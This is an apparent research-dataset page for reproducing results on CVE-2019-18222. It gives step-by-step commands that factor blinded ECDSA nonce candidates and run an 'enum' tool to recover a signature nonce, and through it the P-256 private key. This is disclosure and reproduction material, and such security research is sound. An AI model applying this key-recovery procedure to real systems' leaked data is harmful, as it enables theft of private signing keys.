Dataset Open Access

CVE-2019-18222: research data and tooling

Alejandro Cabrera Aldaya; Billy Bob Brumley

This dataset and software tool are for reproducing the research results related to CVE-2019-18222.


  • enum contains the key enumeration tool.
  • kt_candidates contains the JSON for blinded nonce candidates, indexed by trial number. JSON fields:
  1. kt_candidates: list of nonce candidates.
  • sig_data contains the JSON for ECDSA signatures, index by trial number. JSON fields:
  1. p: the prime the curve is defined over. (P-256 here.)
  2. Gx, Gy: Generator coordinates.
  3. d: Ground truth ECDSA long term key.
  4. Px, Py: Public key coordinates.
  5. h: SHA-256 digest to sign, encoded to the finite field.
  6. k: Ground truth ECDSA nonce.
  7. r, s: ECDSA signature.


cd enum
make clean


Start with enum as the working directory.

cd enum

Pull out a kt candidate, in this example index 847.

$ jq '.kt_candidates' ../kt_candidates/kt_candidates_847.json

Factor that candidate.

$ time sage -c "print ecm.factor(0x48ad7217d10f6c7b1a3db836d38aa3972999115f38a6b3d176fc660941aa5c882d2528ec1fc27da7610e7ee3d7dd84367c380259e0386224c2c46aa2a5eb2a0)"
[2, 2, 2, 2, 2, 3, 353, 193243, 1540830719, 9263081209, 103633959617085683, 151389566295160172521, 283135469779419532841, 572987990320782777757565685333349772719941819448953457732874126833]

real    0m5.837s
user    0m5.648s
sys 0m0.214s

Now pull out the r component of the ECDSA signature for that index, and convert it from hex to base 10.

$ jq '.r' ../sig_data/sig_data_847.json
$ python -c "print 0x30e2ce20a8140177a31a66763d85f431acc9790dd050ffc22ed5d454cdfbbb67"

Now run the enum tool to recover the nonce.

$ ./enum 
Usage: ./enum <jobs_num> <jobs_id> <target_base_10> space delimited flat list of factors in base ten

The <jobs_num> and <jobs_id> arguments are to ease parallel execution; read the source code. But for a single core, pass them as 1 0.

$ ./enum 1 0 22111746808803128586382711090186612204136854333384650261207856620766542674791 2 2 2 2 2 3 353 193243 1540830719 9263081209 103633959617085683 151389566295160172521 2831354697794195
32841 572987990320782777757565685333349772719941819448953457732874126833

where 221..791 is the base-10 r component of the ECDSA signature, and 2 2 .. 572..833 is the full list of blinded nonce factors. In the output:

  • INFO:target:<hex> is the hex form of base-10 target input (ECDSA r component).
  • INFO:found:<hex> is the hex form of the recovered ECDSA nonce.
  • INFO:tests:<num> is the number of tested nonce candidates (scalar multiplications).

We can see this successfully recovered the nonce (hence long term ECDSA private key) correctly:

$ jq '.k' ../sig_data/sig_data_847.json
Files (1.3 MB)
Name Size
1.3 MB Download
All versions This version
Views 205205
Downloads 1515
Data volume 19.4 MB19.4 MB
Unique views 179179
Unique downloads 1414


Cite as